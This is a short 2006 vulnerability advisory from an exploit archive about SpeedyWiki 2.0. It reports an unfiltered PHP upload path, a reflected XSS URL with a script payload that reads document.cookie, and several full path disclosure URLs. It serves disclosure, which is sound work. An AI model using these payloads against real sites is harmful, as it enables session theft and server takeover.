Home / exploitsPDF  

speedwiki20.txt

Posted on 09 November 2006

product :Speedwiki 2.0 vendor site: http://speedywiki.sourceforge.net/ risk:critical a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms path : /speedywiki/index.php?upload=1 xss get : /index.php?showRevisions=</textarea>'"><script>alert(document.cookie)</script> full path disclosure : /speedywiki/index.php?showRevisions[]= /speedywiki/index.php?searchText[]= /speedywiki/upload.php laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com

 

TOP